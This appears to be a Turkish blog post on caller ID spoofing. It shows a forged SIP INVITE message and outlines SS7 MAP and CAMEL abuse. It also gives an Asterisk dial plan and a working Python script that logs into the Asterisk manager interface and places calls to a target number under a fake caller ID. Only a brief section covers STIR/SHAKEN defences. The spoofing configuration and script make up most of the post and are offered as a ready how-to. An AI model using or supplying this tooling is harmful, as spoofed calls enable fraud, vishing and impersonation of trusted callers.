Caller ID Spoofing Yöntemleri: Detaylı ve Teknik İnceleme
Caller ID spoofing, arayan kişinin gerçek numarasını gizleyerek farklı bir numarayla görünmesini sağlayan bir tekniktir. VoIP (Voice over IP) teknolojisi, SIP (Session Initiation Protocol) ve SS7 (Signaling System 7) gibi protokollerin zayıflıkları kullanılarak gerçekleştirilir. Bu makalede, Caller ID spoofing işleminin teknik detaylarına ve kullanılan yöntemlere değineceğiz.
1. SIP (Session Initiation Protocol) Tabanlı Caller ID Spoofing
SIP, VoIP çağrılarının başlatılmasını ve sonlandırılmasını sağlayan bir protokoldür. SIP tabanlı Caller ID spoofing, "From" başlığı manipüle edilerek yapılır. Bu başlık, arayanın numarasını içerir ve doğru doğrulama yapılmadığı için sahte bir numara gönderilebilir.
SIP INVITE Mesajı Detaylı İncelemesi
Aşağıda SIP INVITE mesajının bir örneğini ve nasıl manipüle edilebileceğini inceleyelim:
INVITE sip:target@voipprovider.com SIP/2.0
Via: SIP/2.0/UDP spoofed.com;branch=z9hG4bK776asdhds
Max-Forwards: 70
From: "Sahte Numara" <sip:+905555555555@spoofed.com>;tag=1928301774
To: <sip:+905551234567@voipprovider.com>
Call-ID: a84b4c76e66710@spoofed.com
CSeq: 314159 INVITE
Contact: <sip:+905555555555@spoofed.com>
Content-Type: application/sdp
Content-Length: 0
Yukarıdaki örnekte, sahte Caller ID From başlığında belirtilmiştir. Arayan numara "+905555555555" olarak sahte bir numarayla değiştirilmiştir.
2. SS7 (Signaling System 7) Güvenlik Açıkları
SS7, mobil ağlarda kullanılan sinyalizasyon protokolüdür. Bu protokol, telefon aramaları, SMS ve veri iletimini yönlendirir. SS7’nin güvenlik açıkları, saldırganların Caller ID'yi değiştirmesine izin verir. SS7 ağına erişimi olan bir saldırgan, diğer ağ operatörlerine sahte bilgiler gönderebilir.
SS7 Üzerinden Caller ID Spoofing Yöntemleri
SS7 ile Caller ID spoofing şu yöntemlerle yapılabilir:
- MAP (Mobile Application Part) mesajları manipüle edilerek sahte arayan numara gönderilebilir.
- CAMEL (Customized Applications for Mobile Networks Enhanced Logic) kullanılarak başka bir numara gösterilebilir.
3. SIP Header Manipülasyonu ve Spoofing Araçları
SIP başlıklarının manipüle edilmesi için çeşitli açık kaynaklı araçlar kullanılabilir. Asterisk, bu iş için yaygın kullanılan bir VoIP santrali yazılımıdır. Aşağıda Caller ID spoofing için bir Asterisk örneği verilmiştir:
[spoof]
exten => _X.,1,NoOp(CID Spoofing Başlıyor)
exten => _X.,n,Set(CALLERID(num)=+905555555555)
exten => _X.,n,Dial(SIP/${EXTEN}@provider)
exten => _X.,n,Hangup()
Bu dial plan, her aramada Caller ID'yi sahte bir numara olarak ayarlamaktadır.
4. Caller ID Spoofing'e Karşı Korunma Yöntemleri
Caller ID spoofing saldırılarına karşı korunmak için STIR/SHAKEN gibi protokoller geliştirilmiştir. Bu sistemler, arayan numaraların dijital olarak imzalanmasını sağlar.
STIR/SHAKEN Nedir?
STIR (Secure Telephone Identity Revisited) ve SHAKEN (Signature-based Handling of Asserted information using toKENs), VoIP çağrılarının güvenilirliğini sağlamak için geliştirilmiştir. Bu protokoller, çağrıların dijital sertifikalarla doğrulanmasını sağlar ve sahte arayan numaraları engeller.
5. Demo: Caller ID Spoofing Uygulaması
Aşağıda, Asterisk AMI (Asterisk Manager Interface) kullanılarak Caller ID spoofing işlemini gerçekleştiren basit bir Python uygulaması verilmiştir:
import socket
ami_host = "127.0.0.1"
ami_port = 5038
ami_user = "admin"
ami_secret = "password"
spoofed_caller_id = "+905555555555"
target_number = "+905551234567"
def ami_login(sock):
login_action = f"Action: Login\\r\\nUsername: {ami_user}\\r\\nSecret: {ami_secret}\\r\\n\\r\\n"
sock.send(login_action.encode())
def make_call(sock):
ami_login(sock)
call_action = f"""Action: Originate
Channel: SIP/{target_number}@provider
CallerID: {spoofed_caller_id}
Context: default
Exten: {target_number}
Priority: 1
\\r\\n"""
sock.send(call_action.encode())
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ami_host, ami_port))
make_call(sock)
response = sock.recv(4096)
print(response.decode())
sock.close()
Bu script, sahte bir Caller ID ile hedef numaraya arama yapar. Asterisk sunucusuna bağlanarak aramanın başlatılması sağlanır.
Sonuç
Caller ID spoofing, VoIP ve SS7 gibi iletişim protokollerindeki güvenlik açıklarından yararlanarak gerçekleştirilen yaygın bir saldırı türüdür. Bu yöntem, arayanın kimliğini manipüle ederek farklı bir numarayla çağrı yapılmasını sağlar. SIP ve SS7 altyapısındaki eksiklikler, saldırganların kimlik doğrulama yapılmaksızın arayan numarayı değiştirmesine izin verir. Ancak, STIR/SHAKEN gibi çözümler, Caller ID spoofing’e karşı etkili koruma sağlar.
Güvenlik açığına sahip protokoller her zaman saldırganlar için bir hedef oluştursa da, operatörlerin ve servis sağlayıcıların bu yeni teknolojilere geçiş yapması, sahte arayan numara saldırılarını büyük ölçüde engelleyecektir.
Video sahibi https://x.com/Root0ne
Yorumlar
Yorum Gönder